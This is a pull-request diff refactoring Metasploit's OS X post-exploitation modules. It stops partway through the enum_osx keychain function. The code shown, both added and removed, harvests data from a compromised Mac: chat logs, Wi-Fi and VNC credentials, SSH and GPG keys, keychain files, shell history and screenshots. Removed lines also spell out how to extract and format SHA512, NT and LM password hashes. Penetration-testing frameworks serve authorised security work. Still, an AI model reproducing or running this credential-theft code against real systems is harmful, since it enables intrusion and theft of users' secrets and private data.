### PR TITLE
Clean up the osx enum_* modules.

### DIFF
--- a/modules/post/osx/gather/enum_adium.rb
+++ b/modules/post/osx/gather/enum_adium.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Post
         # Filter out logs
         filtered_logs = []
         logs.each do |log|
-          if not datastore['PATTERN'] or log =~ datastore['PATTERN']
+          if datastore['PATTERN'].blank? or log =~ datastore['PATTERN']
             # For debugging purposes, we print all the matches
             vprint_status("Match: #{log}")
             filtered_logs << log

--- a/modules/post/osx/gather/enum_adium.rb
+++ b/modules/post/osx/gather/enum_adium.rb
@@ -20,14 +20,13 @@ class Metasploit3 < Msf::Post
         victim's machine.  There are three different actions you may choose: ACCOUNTS,
         CHATS, and ALL.  Note that to use the 'CHATS' action, make sure you set the regex
         'PATTERN' option in order to look for certain log names (which consists of a
-        contact's name, and a timestamp).  The current 'PATTERN' option is configured to
-        look for any log created on February 2012 as an example.  To loot both account
-        plists and chat logs, simply set the action to 'ALL'.
+        contact's name, and a timestamp). To loot both account  plists and chat logs,
+        simply set the action to 'ALL'.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'sinn3r'],
+      'Author'        => [ 'sinn3r' ],
       'Platform'      => [ 'osx' ],
-      'SessionTypes'  => [ "shell" ],
+      'SessionTypes'  => [ 'shell', 'meterpreter' ],
       'Actions'       =>
         [
           ['ACCOUNTS', { 'Description' => 'Collect account-related plists' } ],
@@ -39,7 +38,7 @@ class Metasploit3 < Msf::Post
 
     register_options(
       [
-        OptRegexp.new('PATTERN', [true, 'Match a keyword in any chat log\'s filename', '\(2012\-02\-.+\)\.xml$']),
+        OptRegexp.new('PATTERN', [false, 'Match a keyword in any chat log\'s filename', nil])
       ], self.class)
   end
 
@@ -49,7 +48,7 @@ class Metasploit3 < Msf::Post
   #
   def plutil(filename)
     exec("plutil -convert xml1 #{filename}")
-    data = exec("cat #{filename}")
+    data = read_file(filename)
     return data
   end
 
@@ -76,7 +75,7 @@ class Metasploit3 < Msf::Post
         # Filter out logs
         filtered_logs = []
         logs.each do |log|
-          if log =~ datastore['PATTERN']
+          if not datastore['PATTERN'] or log =~ datastore['PATTERN']
             # For debugging purposes, we print all the matches
             vprint_status("Match: #{log}")
             filtered_logs << log
@@ -150,7 +149,7 @@ class Metasploit3 < Msf::Post
       # Save data, and then clean up
       #
       if xml.empty?
-        print_error("#{@peer} - Unalbe to parse: #{file}")
+        print_error("#{@peer} - Unable to parse: #{file}")
       else
         loot << {:filename => file, :data => xml}
         exec("rm #{rand_name}")

--- a/modules/post/osx/gather/enum_airport.rb
+++ b/modules/post/osx/gather/enum_airport.rb
@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post
       'License'       => MSF_LICENSE,
       'Author'        => [ 'sinn3r' ],
       'Platform'      => [ 'osx' ],
-      'SessionTypes'  => [ "shell" ]
+      'SessionTypes'  => [ 'shell', 'meterpreter' ]
     ))
   end
 

--- a/modules/post/osx/gather/enum_airport.rb
+++ b/modules/post/osx/gather/enum_airport.rb
@@ -7,6 +7,8 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Post
 
+  include Msf::Post::File
+
   def initialize(info={})
     super(update_info(info,
       'Name'          => 'OS X Gather Airport Wireless Preferences',
@@ -16,7 +18,7 @@ class Metasploit3 < Msf::Post
         SSID, Channels, Security Type, Password ID, etc.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'sinn3r'],
+      'Author'        => [ 'sinn3r' ],
       'Platform'      => [ 'osx' ],
       'SessionTypes'  => [ "shell" ]
     ))
@@ -43,7 +45,7 @@ class Metasploit3 < Msf::Post
 
 
   def get_air_preferences
-    pref = exec("cat /Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist")
+    pref = read_file("/Library/Preferences/SystemConfiguration/com.apple.airport.preferences.plist")
     return pref =~ /No such file or directory/ ? nil : pref
   end
 

--- a/modules/post/osx/gather/enum_chicken_vnc_profile.rb
+++ b/modules/post/osx/gather/enum_chicken_vnc_profile.rb
@@ -19,9 +19,9 @@ class Metasploit3 < Msf::Post
         as as the	IP and password.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'sinn3r'],
+      'Author'        => [ 'sinn3r' ],
       'Platform'      => [ 'osx' ],
-      'SessionTypes'  => [ "shell" ]
+      'SessionTypes'  => [ 'shell', 'meterpreter' ]
     ))
 
   end

--- a/modules/post/osx/gather/enum_osx.rb
+++ b/modules/post/osx/gather/enum_osx.rb
@@ -12,22 +12,37 @@ class Metasploit3 < Msf::Post
   include Msf::Post::File
   include Msf::Auxiliary::Report
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'          => 'OS X Gather Mac OS X System Information Enumeration',
-        'Description'   => %q{
-            This module gathers basic system information from Mac OS X Tiger, Leopard,
-          Snow Leopard and Lion systems.
-        },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
-        'Platform'      => [ 'osx' ],
-        'SessionTypes'  => [ "shell" ]
-      ))
+  # set of files to ignore while looping over files in a directory
+  OSX_IGNORE_FILES = [".", "..", ".DS_Store"]
 
+  # set of accounts to ignore while pilfering data
+  OSX_IGNORE_ACCOUNTS = ["Shared", ".localized"]
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'OS X Gather Mac OS X System Information Enumeration',
+      'Description'   => %q{
+          This module gathers basic system information from Mac OS X 10.4+. If the
+          session is root, data will be gathered from all users on the system.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>', 'joev' ],
+      'Platform'      => [ 'osx' ],
+      'SessionTypes'  => [ 'shell', 'meterpreter' ]
+    ))
+
+    register_options([
+      OptBool.new('SYSCONF',      [false, 'Capture system configuration and status.', true]),
+      OptBool.new('ACCOUNTS',     [false, 'Capture user account information.', true]),
+      OptBool.new('SSHKEYS',      [false, 'Capture accessible SSH keys.', true]),
+      OptBool.new('GPGKEYS',      [false, 'Capture accessible GPG keys.', true]),
+      OptBool.new('SCREENSHOT',   [false, 'Capture a screenshot of user\'s desktop.', true]),
+      OptBool.new('HASHES',       [false, 'Capture accessible password hashes.', true]),
+      OptBool.new('SHELLHISTORY', [false, 'Capture accessible shell history files.', true]),
+      OptBool.new('KEYCHAINS',    [false, 'Capture accessible keychain files.', true])
+    ], self.class)
   end
 
-  # Run Method for when run command is issued
   def run
     case session.type
     when /meterpreter/
@@ -36,603 +51,290 @@ class Metasploit3 < Msf::Post
       host = session.shell_command_token("hostname").chomp
     end
     print_status("Running module against #{host}")
-    running_root = check_root
-    if running_root
+    if root?
       print_status("This session is running as root!")
     end
-    ver_num = get_ver
-    log_folder = log_folder_create()
-    enum_conf(log_folder)
-    enum_accounts(log_folder, ver_num)
-    get_crypto_keys(log_folder)
-    screenshot(log_folder, ver_num)
-    dump_hash(ver_num) if running_root
-    dump_bash_history(log_folder)
-    get_keychains(log_folder)
 
+    # enum_conf         if datastore['SYSCONF']
+    # enum_accounts     if datastore['ACCOUNTS']
+    # get_crypto_keys
+    # screenshot        if datastore['SCREENSHOT']
+    dump_hashes       if datastore['HASHES'] and root?
+    dump_bash_history if datastore['SHELLHISTORY']
+    get_keychains     if datastore['KEYCHAINS']
   end
 
-  #parse the dslocal plist in lion
+  # parse the dslocal plist in lion
   def read_ds_xml_plist(plist_content)
-
     require "rexml/document"
 
     doc  = REXML::Document.new(plist_content)
     keys = []
-
-    doc.elements.each("plist/dict/key") do |element|
-      keys << element.text
-    end
-
     fields = {}
-    i = 0
-    doc.elements.each("plist/dict/array") do |element|
+
+    doc.elements["plist/dict/key"].each { |element| keys << element.to_s }
+    doc.elements["plist/dict/array"].each_with_index do |element, i|
+      next if element.kind_of? REXML::Text
       data = []
       fields[keys[i]] = data
       element.each_element("*") do |thing|
-        data_set = thing.text
+        data_set = thing.to_s
         if data_set
           data << data_set.gsub("\n\t\t","")
         else
           data << data_set
         end
       end
-      i+=1
     end
     return fields
   end
 
-  # Function for creating the folder for gathered data
-  def log_folder_create(log_path = nil)
-    #Get hostname
-    case session.type
-    when /meterpreter/
-      host = Rex::FileUtils.clean_path(sysinfo["Computer"])
-    when /shell/
-      host = Rex::FileUtils.clean_path(session.shell_command_token("hostname").chomp)
-    end
-
-    # Create Filename info to be appended to downloaded files
-    filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-
-    # Create a directory for the logs
-    if log_path
-      logs = ::File.join(log_path, 'logs', "enum_osx", host + filenameinfo )
-    else
-      logs = ::File.join(Msf::Config.log_directory, "post", "enum_osx", host + filenameinfo )
-    end
-
-    # Create the log directory
-    ::FileUtils.mkdir_p(logs)
-    return logs
-  end
-
-  # Checks if running as root on the target
-  def check_root
-    # Get only the account ID
-    case session.type
-    when /shell/
-      id = session.shell_command_token("/usr/bin/id -ru").chomp
-    when /meterpreter/
-      id = cmd_exec("/usr/bin/id","-ru").chomp
-    end
-    if id == "0"
-      return true
-    else
-      return false
-    end
-  end
-
-  # Checks if the target is OSX Server
-  def check_server
-    # Get the OS Name
-    case session.type
-    when /meterpreter/
-      osx_ver = cmd_exec("/usr/bin/sw_vers", "-productName").chomp
-    when /shell/
-      osx_ver = session.shell_command_token("/usr/bin/sw_vers -productName").chomp
-    end
-    if osx_ver =~/Server/
-      return true
-    else
-      return false
-    end
-  end
-
-  # Enumerate the OS Version
-  def get_ver
-    # Get the OS Version
-    case session.type
-    when /meterpreter/
-      osx_ver_num = cmd_exec("/usr/bin/sw_vers", "-productVersion").chomp
-    when /shell/
-      osx_ver_num = session.shell_command_token("/usr/bin/sw_vers -productVersion").chomp
-    end
-
-
-    return osx_ver_num
-  end
-
-  def enum_conf(log_folder)
+  def enum_conf
     platform_type = session.platform
     session_type = session.type
-    profile_datatypes = {"OS" => "SPSoftwareDataType",
-      "Network" => "SPNetworkDataType",
-      "Bluetooth" => "SPBluetoothDataType",
-      "Ethernet" => "SPEthernetDataType",
-      "Printers" => "SPPrintersDataType",
-      "USB" => "SPUSBDataType",
-      "Airport" => "SPAirPortDataType",
-      "Firewall" => "SPFirewallDataType",
-      "Known Networks" => "SPNetworkLocationDataType",
-      "Applications" => "SPApplicationsDataType",
+    profile_datatypes = {
+      "OS"                => "SPSoftwareDataType",
+      "Network"           => "SPNetworkDataType",
+      "Bluetooth"         => "SPBluetoothDataType",
+      "Ethernet"          => "SPEthernetDataType",
+      "Printers"          => "SPPrintersDataType",
+      "USB"               => "SPUSBDataType",
+      "Airport"           => "SPAirPortDataType",
+      "Firewall"          => "SPFirewallDataType",
+      "Known Networks"    => "SPNetworkLocationDataType",
+      "Applications"      => "SPApplicationsDataType",
       "Development Tools" => "SPDeveloperToolsDataType",
-      "Frameworks" => "SPFrameworksDataType",
-      "Logs" => "SPLogsDataType",
-      "Preference Panes" => "SPPrefPaneDataType",
-      "StartUp" => "SPStartupItemDataType"}
+      "Frameworks"        => "SPFrameworksDataType",
+      "Logs"              => "SPLogsDataType",
+      "Preference Panes"  => "SPPrefPaneDataType",
+      "StartUp"           => "SPStartupItemDataType"
+    }
     shell_commands = {
-      "TCP Connections" => ["/usr/sbin/netstat","-np tcp"],
-      "UDP Connections" => ["/usr/sbin/netstat","-np udp"],
-      "Environment Variables" => ["/usr/bin/printenv",""],
-      "Last Boottime" => ["/usr/bin/who","-b"],
-      "Current Activity" => ["/usr/bin/who",""],
-      "Process List" => ["/bin/ps","-ea"]
+      "TCP Connections"       => "/usr/sbin/netstat -np tcp",
+      "UDP Connections"       => "/usr/sbin/netstat -np udp",
+      "Environment Variables" => "/usr/bin/printenv",
+      "Last Boottime"         => "/usr/bin/who -b",
+      "Current Activity"      => "/usr/bin/who",
+      "Process List"          => "/bin/ps -ea"
     }
 
-    print_status("Saving all data to #{log_folder}")
-
     # Enumerate first using System Profiler
-    profile_datatypes.each do |name,profile_datatypes|
+    profile_datatypes.each do |name, proftype|
       print_status("\tEnumerating #{name}")
-
-      # Run commands according to the session type
-
-        if session_type =~ /meterpreter/
-
-          returned_data = cmd_exec("system_profiler",profile_datatypes)
-
-          # Save data lo log folder
-          file_local_write(log_folder+"//#{name}.txt",returned_data)
-        elsif session_type =~ /shell/
-          begin
-            returned_data = session.shell_command_token("/usr/sbin/system_profiler #{profile_datatypes}",15)
-
-            # Save data lo log folder
-            file_local_write(log_folder+"//#{name}.txt",returned_data)
-          rescue
-          end
-        end
+      add_loot("#{name}.txt", cmd_exec("/usr/sbin/system_profiler #{proftype}", nil, 15))
     end
 
     # Enumerate using system commands
     shell_commands.each do |name, command|
       print_status("\tEnumerating #{name}")
-
-      # Run commands according to the session type
-      begin
-        if session_type =~ /meterpreter/
-
-          command_output = cmd_exec(command[0],command[1])
-
-          # Save data lo log folder
-          file_local_write(log_folder+"//#{name}.txt",command_output)
-
-        elsif session_type =~ /shell/
-
-          command_output = session.shell_command_token(command.join(" "),15)
-
-          # Save data lo log folder
-          file_local_write(log_folder+"//#{name}.txt",command_output)
-        end
-      rescue
-        print_error("failed to run #{name}")
-      end
+      add_loot("#{name}.txt", cmd_exec(command))
     end
   end
 
 
-  def enum_accounts(log_folder,ver_num)
-
+  def enum_accounts
     # Specific commands for Leopard and Snow Leopard
     leopard_commands = {
-      "Users" => ["/usr/bin/dscacheutil","-q user"],
-      "Groups" => ["/usr/bin/dscacheutil","-q group"]
-
-      }
+      "Users"  => "/usr/bin/dscacheutil -q user",
+      "Groups" => "/usr/bin/dscacheutil -q group"
+    }
 
     # Specific commands for Tiger
     tiger_commands = {
-      "Users" => ["/usr/sbin/lookupd","-q user"],
-      "Groups" => ["/usr/sbin/lookupd","-q group"]
+      "Users"  => "/usr/sbin/lookupd -q user",
+      "Groups" => "/usr/sbin/lookupd -q group"
+    }
 
-      }
-    if ver_num =~ /10\.(7|6|5)/
+    if leopard?
       shell_commands = leopard_commands
-    else
+    elsif tiger?
       shell_commands = tiger_commands
     end
+
     shell_commands.each do |name, command|
       print_status("\tEnumerating #{name}")
-
-      # Run commands according to the session type
-      if session.type =~ /meterpreter/
-
-        command_output = cmd_exec(command[0],command[1])
-
-        # Save data lo log folder
-        file_local_write(log_folder+"//#{name}.txt",command_output)
-
-      elsif session.type =~ /shell/
-
-        command_output = session.shell_command_token(command.join(" "),15)
-
-        # Save data lo log folder
-        file_local_write(log_folder+"//#{name}.txt",command_output)
+      output = cmd_exec(command)
+      if output.blank?
+        print_status "#{name} not found"
+      else
+        add_loot("#{name}.txt", output)
       end
     end
-
   end
 
-
-  # Method for getting SSH and GPG Keys
-  def get_crypto_keys(log_folder)
-
-    # Run commands according to the session type
-    if session.type =~ /shell/
-
-      # Enumerate and retreave files according to privilege level
-      if not check_root
-
-        # Enumerate the home folder content
-        home_folder_list = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
-
-        # Check for SSH folder and extract keys if found
-        if home_folder_list.include?("\.ssh")
-          print_status(".ssh Folder is present")
-          ssh_folder = session.shell_command_token("/bin/ls -ma ~/.ssh").chomp.split(", ")
-          ssh_folder.each do |k|
-            next if k =~/^\.$|^\.\.$/
-            print_status("\tDownloading #{k.strip}")
-            ssh_file_content = session.shell_command_token("/bin/cat ~/.ssh/#{k}")
-
-            # Save data lo log folder
-            file_local_write(log_folder+"//#{name}",ssh_file_content)
-          end
-        end
-
-        # Check for GPG and extract keys if found
-        if home_folder_list.include?("\.gnupg")
-          print_status(".gnupg Folder is present")
-          gnugpg_folder = session.shell_command_token("/bin/ls -ma ~/.gnupg").chomp.split(", ")
-          gnugpg_folder.each do |k|
-            next if k =~/^\.$|^\.\.$/
-            print_status("\tDownloading #{k.strip}")
-            gpg_file_content = session.shell_command_token("/bin/cat ~/.gnupg/#{k.strip}")
-
-            # Save data lo log folder
-            file_local_write(log_folder+"//#{name}",gpg_file_content)
-          end
-        end
-      else
-        users = []
-        case session.type
-        when /meterpreter/
-          users_folder = cmd_exec("/bin/ls","/Users")
-        when /shell/
-          users_folder = session.shell_command_token("/bin/ls /Users")
-        end
-        users_folder.each_line do |u|
-          next if u.chomp =~ /Shared|\.localized/
-          users << u.chomp
-        end
-
-        users.each do |u|
-          user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
-          if user_folder.include?("\.ssh")
-            print_status(".ssh Folder is present for #{u}")
-            ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.ssh").chomp.split(", ")
-            ssh_folder.each do |k|
-              next if k =~/^\.$|^\.\.$/
-              print_status("\tDownloading #{k.strip}")
-              ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.ssh/#{k}")
-
-              # Save data lo log folder
-              file_local_write(log_folder+"//#{name}",ssh_file_content)
-            end
-          end
-        end
-
-
-        users.each do |u|
-          user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
-          if user_folder.include?("\.ssh")
-            print_status(".gnupg Folder is present for #{u}")
-            ssh_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/.gnupg").chomp.split(", ")
-            ssh_folder.each do |k|
-              next if k =~/^\.$|^\.\.$/
-              print_status("\tDownloading #{k.strip}")
-              ssh_file_content = session.shell_command_token("/bin/cat /Users/#{u}/.gnupg/#{k}")
-
-              # Save data lo log folder
-              file_local_write(log_folder+"//#{name}",ssh_file_content)
-            end
-          end
-        end
-
+  def get_ssh_keys(user)
+    return unless datastore['SSHKEYS']
+    # Check for SSH and extract keys if found
+    home_folder_list = cmd_exec("/bin/ls -ma #{home_dir user}").chomp.split(", ")
+    if home_folder_list.include?("\.ssh")
+      print_status("#{home_dir user}.ssh Folder is present")
+      cmd_exec("/bin/ls -ma #{home_dir user}.ssh").chomp.split(", ").each do |k|
+        next if OSX_IGNORE_FILES.include? k
+        print_status("\tDownloading #{k.strip}")
+        add_loot("#{name}", read_file("#{home_dir user}.ssh/#{k}"))
       end
     end
+  end
+
+  def get_gpg_keys(user)
+    return unless datastore['GPGKEYS']
+    # Check for GPG and extract keys if found
+    home_folder_list = cmd_exec("/bin/ls -ma #{home_dir user}").chomp.split(", ")
+    if home_folder_list.include?("\.gnupg")
+      print_status("#{home_dir user}.gnupg Folder is present")
+      gnugpg_folder = cmd_exec("/bin/ls -ma #{home_dir user}.gnupg").chomp.split(", ")
+      gnugpg_folder.each do |k|
+        next if OSX_IGNORE_FILES.include? k
+        print_status("\tDownloading #{k.strip}")
+        add_loot("#{name}", read_file("#{home_dir user}.gnupg/#{k.strip}"))
+      end
+    end
+  end
+
+  # Method for getting SSH and GPG Keys
+  def get_crypto_keys
+    # Enumerate and retreave files according to privilege level
+    if not root?
+      # Enumerate the home folder content
+      get_ssh_keys(whoami)
+      get_gpg_keys(whoami)
+    else
+      users.each do |user|
+        get_ssh_keys(user)
+        get_gpg_keys(user)
+      end
+    end
+  end
+
+  # Run the hashdump module if the user is root
+  def dump_hashes
+    mod = framework.post.create('osx/gather/hashdump')
+    mod.datastore.merge!('SESSION' => datastore['SESSION'])
+    Msf::Simple::Post.run_simple(mod)
   end
 
   # Method  for capturing screenshot of targets
-  def screenshot(log_folder, ver_num)
-    if ver_num =~ /10\.(7|6|5)/
+  def screenshot
+    if leopard?
       print_status("Capturing screenshot")
-      picture_name = ::Time.now.strftime("%Y%m%d.%M%S")
-      if check_root
+      if root?
         print_status("Capturing screenshot for each loginwindow process since privilege is root")
-        if session.type =~ /shell/
-          loginwindow_pids = session.shell_command_token("/bin/ps aux \| /usr/bin/awk \'/name/ \&\& \!/awk/ \{print \$2\}\'").split("\n")
-          loginwindow_pids.each do |pid|
-            print_status("\tCapturing for PID:#{pid}")
-            session.shell_command_token("/bin/launchctl bsexec #{pid} /usr/sbin/screencapture -x /tmp/#{pid}.jpg")
-            file_local_write(log_folder+"//screenshot_#{pid}.jpg",
-            session.shell_command_token("/bin/cat /tmp/#{pid}.jpg"))
-            session.shell_command_token("/usr/bin/srm -m -z /tmp/#{pid}.jpg")
-          end
+        loginwindow_pids = cmd_exec("/bin/ps aux \| /usr/bin/awk \'/Finder\\.app/ \&\& \!/awk/ \{print \$2\}\'").split("\n")
+        loginwindow_pids.each do |pid|
+          print_status("\tCapturing for PID: #{pid}")
+          cmd_exec("/bin/launchctl bsexec #{pid} /usr/sbin/screencapture -x /tmp/#{pid}.jpg")
+          add_loot("screenshot_#{pid}.jpg", read_file("/tmp/#{pid}.jpg"))
+          cmd_exec("/usr/bin/srm -m -z /tmp/#{pid}.jpg")
         end
       else
-        # Run commands according to the session type
-        if session.type =~ /shell/
-          session.shell_command_token("/usr/sbin/screencapture -x /tmp/#{picture_name}.jpg")
-          file_local_write(log_folder+"//screenshot.jpg",
-          session.shell_command_token("/bin/cat /tmp/#{picture_name}.jpg"))
-          session.shell_command_token("/usr/bin/srm -m -z /tmp/#{picture_name}.jpg")
-        end
+        picture_name = ::Time.now.strftime("%Y%m%d.%M%S")
+        cmd_exec("/usr/sbin/screencapture -x /tmp/#{picture_name}.jpg")
+        add_loot("screenshot.jpg", read_file("/tmp/#{picture_name}.jpg"))
+        cmd_exec("/usr/bin/srm -m -z /tmp/#{picture_name}.jpg")
       end
       print_status("Screenshot Captured")
-
     end
   end
 
-  def dump_bash_history(log_folder)
+  def dump_bash_history_for(user)
+    cmd_exec("/bin/ls -ma #{home_dir user}").chomp.split(", ").each do |f|
+      if f =~ /\.\w*\_history/
+        print_status("\tHistory file #{f.strip} found for #{user}")
+        print_status("\tDownloading #{f.strip}")
+        add_loot("root_#{f.strip}.txt", read_file("#{homedir}#{f.strip}"))
+      end
+    end
+  end
+
+  def dump_bash_history
     print_status("Extracting history files")
-    # Run commands according to the session type
-    users = []
-    case session.type
-    when /meterpreter/
-      users_folder = cmd_exec("/bin/ls","/Users").chomp
-      current_user = cmd_exec("/usr/bin/id","-nu").chomp
-    when /shell/
-      users_folder = session.shell_command_token("/bin/ls /Users").chomp
-      current_user = session.shell_command_token("/usr/bin/id -nu").chomp
-    end
-    users_folder.each_line do |u|
-      next if u.chomp =~ /Shared|\.localized/
-      users << u.chomp
-    end
-
     # If we are root lets get root for when sudo was used and all users
-    if current_user == "root"
-
-      # Check the root user folder
-      root_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
-      root_folder.each do |f|
-        if f =~ /\.\w*\_history/
-          print_status("\tHistory file #{f.strip} found for root")
-          print_status("\tDownloading #{f.strip}")
-          sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
-
-          # Save data lo log folder
-          file_local_write(log_folder+"//root_#{f.strip}.txt",sh_file)
-        end
-      end
-
-      # Getting the history files for all users
-      users.each do |u|
-
-        # Lets get a list of all the files on the users folder and place them in an array
-        user_folder = session.shell_command_token("/bin/ls -ma /Users/#{u}/").chomp.split(", ")
-        user_folder.each do |f|
-          if f =~ /\.\w*\_history/
-            print_status("\tHistory file #{f.strip} found for #{u}")
-            print_status("\tDownloading #{f.strip}")
-            sh_file = session.shell_command_token("/bin/cat /Users/#{u}/#{f.strip}")
-
-            # Save data lo log folder
-            file_local_write(log_folder+"//#{u}_#{f.strip}.txt",sh_file)
-          end
-        end
-      end
-
+    if root?
+      dump_bash_history_for('root')
+      users.each { |user| dump_bash_history_for(user) }
     else
-      current_user_folder = session.shell_command_token("/bin/ls -ma ~/").chomp.split(", ")
-      current_user_folder.each do |f|
-        if f =~ /\.\w*\_history/
-          print_status("\tHistory file #{f.strip} found for #{current_user}")
-          print_status("\tDownloading #{f.strip}")
-          sh_file = session.shell_command_token("/bin/cat ~/#{f.strip}")
-
-          # Save data lo log folder
-          file_local_write(log_folder+"//#{current_user}_#{f.strip}.txt",sh_file)
-        end
-      end
+      dump_bash_history_for(whoami)
     end
-  end
-  # Dump SHA1 Hashes used by OSX, must be root to get the Hashes
-  def dump_hash(log_folder,ver_num)
-    print_status("Dumping Hashes")
-    users = []
-    nt_hash = nil
-    host = session.session_host
-
-    # Path to files with hashes
-    sha1_file = ""
-
-    # Check if system is Lion if not continue
-    if ver_num =~ /10\.(7)/
-
-      hash_decoded = ""
-
-      # get list of profiles present in the box
-      profiles = cmd_exec("ls /private/var/db/dslocal/nodes/Default/users").split("\n")
-
-      if profiles
-        profiles.each do |p|
-          # Skip none user profiles
-          next if p =~ /^_/
-          next if p =~ /^daemon|root|nobody/
-
-          # Turn profile plist in to XML format
-          cmd_exec("cp","/private/var/db/dslocal/nodes/Default/users/#{p.chomp} /tmp/")
-          cmd_exec("plutil","-convert xml1 /tmp/#{p.chomp}")
-          file = cmd_exec("cat","/tmp/#{p.chomp}")
-
-          # Clean up using secure delete overwriting and zeroing blocks
-          cmd_exec("/usr/bin/srm","-m -z /tmp/#{p.chomp}")
-
-          # Process XML Plist into a usable hash
-          plist_values = read_ds_xml_plist(file)
-
-          # Extract the shadow hash data, decode it and format it
-          plist_values['ShadowHashData'].join("").unpack('m')[0].each_byte do |b|
-            hash_decoded << sprintf("%02X", b)
-          end
-          user = plist_values['name'].join("")
-
-          # Check if NT HASH is present
-          if hash_decoded =~ /4F1010/
-            nt_hash = hash_decoded.scan(/^\w*4F1010(\w*)4F1044/)[0][0]
-          end
-
-          # Carve out the SHA512 Hash, the first 4 bytes is the salt
-          sha512 = hash_decoded.scan(/^\w*4F1044(\w*)(080B190|080D101E31)/)[0][0]
-
-          print_status("SHA512:#{user}:#{sha512}")
-          sha1_file << "#{user}:#{sha512}\n"
-
-          # Reset hash value
-          sha512 = ""
-
-          if nt_hash
-            print_status("NT:#{user}:#{nt_hash}")
-            print_status("Credential saved in database.")
-            report_auth_info(
-              :host   => host,
-              :port   => 445,
-              :sname  => 'smb',
-              :user   => user,
-              :pass   => "AAD3B435B51404EE:#{nt_hash}",
-              :active => true
-            )
-
-            # Reset hash value
-            nt_hash = nil
-          end
-          # Reset hash value
-          hash_decoded = ""
-        end
-      end
-      # Save pwd file
-      upassf = store_loot("osx.hashes.sha512", "text/plain", session, sha1_file, "unshadowed_passwd.pwd", "OSX Unshadowed SHA512 Password File")
-      print_good("Unshadowed Password File: #{upassf}")
-
-      # If system was lion and it was processed nothing more to do
-      return
-    end
-
-    users_folder = cmd_exec("/bin/ls","/Users")
-
-    users_folder.each_line do |u|
-      next if u.chomp =~ /Shared|\.localized/
-      users << u.chomp
-    end
-    # Process each user
-    users.each do |user|
-      if ver_num =~ /10\.(6|5)/
-        guid = cmd_exec("/usr/bin/dscl", "localhost -read /Search/Users/#{user} | grep GeneratedUID | cut -c15-").chomp
-      elsif ver_num =~ /10\.(4|3)/
-        guid = cmd_exec("/usr/bin/niutil","-readprop . /users/#{user} generateduid").chomp
-      end
-
-      # Extract the hashes
-      sha1_hash = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c169-216").chomp
-      nt_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c1-32").chomp
-      lm_hash   = cmd_exec("/bin/cat", "/var/db/shadow/hash/#{guid}  | cut -c33-64").chomp
-
-      # Check that we have the hashes and save them
-      if sha1_hash !~ /00000000000000000000000000000000/
-        print_status("SHA1:#{user}:#{sha1_hash}")
-        sha1_file << "#{user}:#{sha1_hash}"
-      end
-
-      if nt_hash !~ /000000000000000/
-        print_status("NT:#{user}:#{nt_hash}")
-        print_status("Credential saved in database.")
-        report_auth_info(
-          :host   => host,
-          :port   => 445,
-          :sname  => 'smb',
-          :user   => user,
-          :pass   => "AAD3B435B51404EE:#{nt_hash}",
-          :active => true
-        )
-      end
-      if lm_hash !~ /0000000000000/
-        print_status("LM:#{user}:#{lm_hash}")
-        print_status("Credential saved in database.")
-        report_auth_info(
-          :host   => host,
-          :port   => 445,
-          :sname  => 'smb',
-          :user   => user,
-          :pass   => "#{lm_hash}:",
-          :active => true
-        )
-      end
-    end
-    # Save pwd file
-    upassf = store_loot("osx.hashes.sha1", "text/plain", session, sha1_file, "unshadowed_passwd.pwd", "OSX Unshadowed SHA1 Password File")
-    print_good("Unshadowed Password File: #{upassf}")
   end
 
   # Download configured Keychains
-  def get_keychains(log_folder)
-    users = []
-    case session.type
-    when /meterpreter/
-      users_folder = cmd_exec("/bin/ls","/Users").chomp
-    when /shell/
-      users_folder = session.shell_command_token("/bin/ls /Users").chomp
-    end
-    users_folder.each_line do |u|
-      next if u.chomp =~ /Shared|\.localized/
-      users << u.chomp
-    end
-    if check_root
-      users.each do |u|
-        print_status("Enumerating and Downloading keychains for #{u}")
-        keychain_files = session.shell_command_token("/usr/bin/sudo -u #{u} -i /usr/bin/security list-keychains").split("\n")
-        keychain_files.each do |k|
-
-          keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
-
-          # Save data lo log folder
-          file_local_write(log_folder+"//#{u}#{k.strip.gsub(/\W/,"_")}",keychain_file)
+  def get_keychains
+    if root?
+      users.each do |user|
+        print_status("Enumerating and Downloading keychains for #{user}")
+        keychain_files = cmd_exec("/usr/bin/sudo -u #{user} -i /usr/bin/security list-keychains").split("\n").map do |file|
+          file.strip.chomp('"').reverse.chomp('"').reverse
         end
+        keychain_files.each { |k| add_loot("keychain_#{File.basename(k, '.*')}.keychain", read_file(k.strip)) }
       end
     else
-      current_user = session.shell_command_token("/usr/bin/id -nu").chomp
-      print_status("Enumerating and Downloading keychains for #{current_user}")
-      keychain_files = session.shell_command_token("usr/bin/security list-keychains").split("\n")
-      keychain_files.each do |k|
-
-        keychain_file = session.shell_command_token("/bin/cat #{k.strip}")
-
-        # Save data lo log folder
-        file_local_write(log_folder+"//#{current_user}#{k.strip.gsub(/\W/,"_")}",keychain_file)
+      print_status("Enumerating and Downloading keychains for #{whoami}")
+      keychain_files = cmd_exec("/usr/bin/security list-keychains").split("\n").map do |file|
+        file.strip.chomp('"').reverse.chomp('"').reverse
       end
